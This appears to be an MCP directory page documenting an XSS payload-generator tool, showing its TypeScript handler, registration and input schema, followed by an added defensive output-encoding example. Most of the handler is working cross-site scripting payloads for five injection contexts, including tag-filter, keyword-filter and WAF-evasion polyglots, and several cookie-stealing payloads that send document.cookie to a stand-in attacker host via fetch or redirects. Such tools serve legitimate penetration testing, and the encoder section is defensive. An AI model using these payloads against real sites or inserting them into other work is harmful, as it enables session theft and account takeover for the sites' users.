
xss_payload_generate

Generate XSS payloads for security testing, tailored to injection contexts like HTML or JavaScript with optional filter evasion techniques.

Instructions

Generate context-appropriate XSS payloads with optional filter evasion. Returns a list of payloads tailored to the injection context and filter bypass requirements. Returns context, filter_bypass, payloads array, notes. Side effects: None. Pure payload generation, no network requests.

Input Schema

| Name | Required | Description | Default |
| --- | --- | --- | --- |
| context | Yes | Injection context: where the user input lands | |
| filter_bypass | No | Level of filter evasion needed | |
| callback_url | No | Attacker-controlled URL for data exfiltration payloads | |

Implementation Reference

  • Handler function for 'xss_payload_generate' tool. It takes context, filter_bypass level, and optional callback_url to generate appropriate XSS payloads.
      async ({ context, filter_bypass = "none", callback_url }) => {
        let payloads: string[] = [];
        let notes = "";
    
        const cb = callback_url ?? "https://attacker.example.com/collect";
    
        if (context === "html_body") {
          if (filter_bypass === "none") {
            payloads = [
              "<script>alert(1)</script>",
              "<img src=x onerror=alert(1)>",
              "<svg onload=alert(1)>",
              `<script>document.location='${cb}?c='+document.cookie</script>`,
              `<script>fetch('${cb}?c='+document.cookie)</script>`,
            ];
          } else if (filter_bypass === "tag_filter") {
            payloads = [
              "<ScRiPt>alert(1)</ScRiPt>",
              "<img src=x onerror=alert(1)>",
              "<svg/onload=alert(1)>",
              "<details open ontoggle=alert(1)>",
              "<body onload=alert(1)>",
              "<marquee onstart=alert(1)>",
              "<video><source onerror=alert(1)>",
            ];
            notes = "If <script> is filtered, event handlers on other tags bypass it.";
          } else if (filter_bypass === "keyword_filter") {
            payloads = [
              "<img src=x onerror=alert`1`>",
              "<img src=x onerror=\\u0061lert(1)>",
              "<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
              "<img src=x onerror=window['al'+'ert'](1)>",
              "<img src=x onerror=self['al'+'ert'](1)>",
            ];
            notes = "Bypasses keyword filters on 'alert', 'script', etc.";
          } else if (filter_bypass === "waf" || filter_bypass === "aggressive") {
            payloads = [
              "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//",
              "<svg/onload=alert(1)>",
              "<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>",
              "{{constructor.constructor('alert(1)')()}}",
              "${alert(1)}",
              "<img src=x onerror=top[/al/.source+/ert/.source](1)>",
            ];
            notes = "Polyglot and encoding-based payloads for WAF evasion.";
          }
        } else if (context === "html_attribute") {
          payloads = [
            `" onfocus=alert(1) autofocus="`,
            `' onfocus=alert(1) autofocus='`,
            `" onmouseover=alert(1) "`,
            `"><script>alert(1)</script>`,
            `' autofocus onfocus=alert(1)//`,
            `" onfocus=fetch('${cb}?c='+document.cookie) autofocus="`,
          ];
          notes = "Break out of attribute context, inject event handler.";
        } else if (context === "javascript") {
          payloads = [
            "'-alert(1)-'",
            "';alert(1)//",
            '";alert(1)//',
            "\\';alert(1)//",
            "</script><script>alert(1)</script>",
            "${alert(1)}",
            `';fetch('${cb}?c='+document.cookie)//`,
          ];
          notes = "Break out of JS string context.";
        } else if (context === "url") {
          payloads = [
            "javascript:alert(1)",
            "data:text/html,<script>alert(1)</script>",
            `javascript:void(document.location='${cb}?c='+document.cookie)`,
          ];
          notes = "URL context — javascript: and data: schemes.";
        } else if (context === "css") {
          payloads = [
            "expression(alert(1))",
            "url(javascript:alert(1))",
            "};alert(1);//",
            `url('${cb}?c='+document.cookie)`,
          ];
          notes = "CSS injection context — limited browser support for JS in CSS.";
        }
    
        const result = {
          context,
          filter_bypass,
          payloads,
          count: payloads.length,
          notes,
          exfiltration_url: callback_url ? cb : "Set callback_url for data theft payloads.",
        };
        return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] };
      }
    );
  • src/tools/xss.ts:88-90 (registration)
    Registration of the 'xss_payload_generate' tool within the McpServer.
    server.tool(
      "xss_payload_generate",
      "Generate context-appropriate XSS payloads with optional filter evasion. Returns a list of payloads tailored to the injection context and filter bypass requirements. Returns context, filter_bypass, payloads array, notes. Side effects: None. Pure payload generation, no network requests.",
  • Input schema definition for 'xss_payload_generate' tool using zod for validation.
    {
      context: z
        .enum(["html_body", "html_attribute", "javascript", "url", "css"])
        .describe("Injection context: where the user input lands"),
      filter_bypass: z
        .enum(["none", "tag_filter", "keyword_filter", "waf", "aggressive"])
        .optional()
        .describe("Level of filter evasion needed"),
      callback_url: z
        .string()
        .optional()
        .describe("Attacker-controlled URL for data exfiltration payloads"),
    },
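
On the defending side, each of the five context values in the schema above calls for a different output encoding. The following is an added example, not code from operant-mcp or from this page; encodeFor and the encoders table are hypothetical names, and the URL and CSS allow-lists are assumptions chosen for illustration.

```javascript
// Added example (not from operant-mcp): output encoders keyed by the tool's
// five `context` values. All names here are hypothetical.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

const encoders = {
  // Text between tags: neutralise the characters that open markup or entities.
  html_body: (s) => s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]),

  // Attribute value: entity-encode every non-alphanumeric code point, so quotes,
  // spaces and "=" cannot end the value or start a new attribute.
  html_attribute: (s) =>
    s.replace(/[^A-Za-z0-9]/gu, (c) => `&#x${c.codePointAt(0).toString(16)};`),

  // Inline script: emit a complete double-quoted string literal. JSON.stringify
  // escapes quotes and backslashes; <, >, & and U+2028/2029 are escaped as well
  // so the value cannot close the surrounding <script> element.
  javascript: (s) =>
    JSON.stringify(s).replace(/[<>&\u2028\u2029]/g,
      (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")),

  // href/src: accept absolute http(s) URLs only (assumed policy); javascript:,
  // data: and unparseable input are rejected. Relative URLs are out of scope.
  url: (s) => {
    let parsed;
    try { parsed = new URL(s.trim()); } catch { return null; }
    return ["http:", "https:"].includes(parsed.protocol) ? parsed.href : null;
  },

  // CSS value: no general escaping is safe, so allow-list a few value shapes
  // (hex colour, bare keyword, simple length; assumed policy) and reject the rest.
  css: (s) =>
    (/^(#[0-9a-fA-F]{3,8}|[a-zA-Z]{1,20}|\d{1,4}(px|em|rem|%))$/.test(s) ? s : null),
};

// Returns the encoded value, or null when the value must not be emitted at all.
function encodeFor(context, value) {
  if (!Object.prototype.hasOwnProperty.call(encoders, context)) {
    throw new Error(`unknown context: ${context}`);
  }
  return encoders[context](String(value));
}
```

The javascript encoder returns the literal including its quotes, so the template must not add its own.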

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/operantlabs/operant-mcp'